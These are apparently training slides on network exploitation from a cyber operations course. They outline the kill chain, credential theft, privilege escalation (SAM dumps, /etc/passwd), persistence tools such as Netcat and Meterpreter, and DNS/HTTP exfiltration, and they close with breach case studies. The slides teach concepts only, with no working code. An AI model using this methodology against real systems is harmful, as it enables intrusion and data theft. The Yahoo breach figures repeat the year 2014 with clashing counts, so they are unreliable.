Network Exploitation

CCTC - Networking

Outcomes


SKILL CCNE015: Communicate cyberspace operations methodologies

SKILL CCNE016: Define common frameworks for conducting cyberspace operations

SKILL CCNE017: Discuss methods to gain access

SKILL CCNE018: Describe network attacks




Cyber Threat Actors


Reference: SANS.org

- Cyber Criminals
- State Sponsored (Nation State)
- Hacktivist
- Insider Threats

Reference: JP3-12R

- Transnational Actor
- Individual Actors or Small Group


Threat Actions


    - Malware
    - Hacking
    - Social Tactics
    - Misuse
    - Physical
    - Error
    - Environmental






The Cyber Kill Chain (Lockheed Martin)

Cyber Methodology


  • Target Discovery 100+ hosts
    • Footprinting, Scanning, Enumeration, Net Mapping
  • Fingerprinting/Enumeration 5-10 hosts
    • OS and Service Identification
  • Port Scanning 1-2 hosts
    • Identify all ports available
  • Gaining Access 1 host
    • Determine the vulnerability to use, test your tools in a controlled environment
  • Privilege Escalation
  • Post Exploitation
    • Target Survey & Remote Forensics Analysis, Data Collection, Establish Persistence, Cover Tracks (cleanup)

Compromised Asset Characteristics



  • Information Technology Assets

  • Critical Information Assets





Information Technology Assets



  • Physical Assets
    • Servers
    • Configurations
    • Network and System Specifications
    • Network Components



Critical Information Assets



  • Intellectual Assets
    • Product Development
    • Processes and Plans
    • Organization charts
    • Credentials



Critical Asset - Credentials


  • Common means for stealing credentials:
    • Social Engineering, reusing stolen passwords/shared credentials, brute force, security question reuse

  • Credentials can provide adversary with:
    • Remote Access - gain remote entry into networks using Virtual Private networks (VPN) or remote access protocols, like RDP and VNC

Preventing Credential Compromise


  • Admin/Domain Admin Credentials
    • Need to be audited
    • Should not have the ability to alter or audit files
    • Require secondary approval

  • Access Controls
    • Behavioral analysis
    • Context Awareness
    • Multi-factor authentication

Network Attack Strategies


  • Social Engineering
    • Phishing, Whaling, Watering Hole, Baiting, Pretexting
  • DoS/DDoS
    • Ping Flood, Ping of Death, Syn Flood, Smurf Attack
  • Injection
    • Web-based (SQL, XXS, FI), Code (SQL, XXS, OS, DE), Process (DLL, PE, etc.)
  • Network Infrastructure Based
    • Man in the Middle, Session Hijacking, Spoofing, Buffer Overflow, Bluetooth
  • Malware
    • Adware, Viruses, Worms, Polymorphic

Internal and External Exploitation


  • Internal
    • Less common, more options
    • Harder to detect
    • Reach more assets

  • External
    • Most common, easily detected
    • Often guarded against


Exploit Components


  • Exploitation Technique
    • The goal is to divert the execution of the vulnerable program

  • Payload
    • Shellcode



Shellcode


  • Types:
    • Local
    • Remote

  • Related Terms:
    • Machine Code
    • Payload


Privilege Escalation


  • Types:
    • Vertical
    • Horizontal

  • Methods:
    • Dump the SAM file
    • Retrieve /etc/passwd
    • Weak permissions on processes
    • Sensitive Information in Shared Folders

Using Stolen Credentials


Movement within a network: Stolen credentials (especially domain admin credentials) can allow an attacker to move laterally within a network, or potentially deeper into higher security areas


Cloud Access: Cloud services that can be accessed via domain credentials allow an attacker to easily access valuable data, especially as organizations move information into the cloud



Persistence



  • Allows for continued and future access to the exploited target by bypassing normal requirements
    • Netcat
    • Meterpreter
    • Registry


Exfiltration


  • Exfiltration done via outbound connections are very common, and hard to counter at the perimeter since this is an area that has been created to focus on incoming threats

  • Common protocols are used to mask data exfiltration:
    • HTTP/HTTPS, FTP, and DNS blends into normal outbound network traffic, thus obfuscating the attacker's actions

  • In-band
  • Out-of-band

Collateral Effects


  • Accidental:
    • Effects when the attacker makes a mistake
    • Attributed Actions, which may lead to criminal charges
    • Loss of tools
    • War
  • Purposeful:
    • Effects wanted by the attacker
    • Data is leaked
    • Identity Theft
    • Meant to cause damage

Collateral Effects


Ashley Madison:

- Responsibility claimed by the "Impact Team"
- Approx. 9.7 Gb of information posted on TOR
- Site source code posted MANY git repositories
- Little hard evidence released; not clear whether this was an insider or external hacking


What are some of the collateral effects?




Collateral Effects


Yahoo Hacking:

- Yahoo's hacking has been measured as the largest data breach in history
- 2014 hack: 500 million accounts, 2014 hack: up to 1 billion accounts
- Not disclosed until 2016
- Two Russian FSB officials indicted
- US has no extradition treaty with Russia

What are some of the collateral effects?

Collateral Effects


OPM Hack:

- Breached December 2014
- 21 Million current/former Fed. Employees' PII leaked
- China is suspected of the breach
- SF-86's...foreign contacts?


What are some of the collateral effects?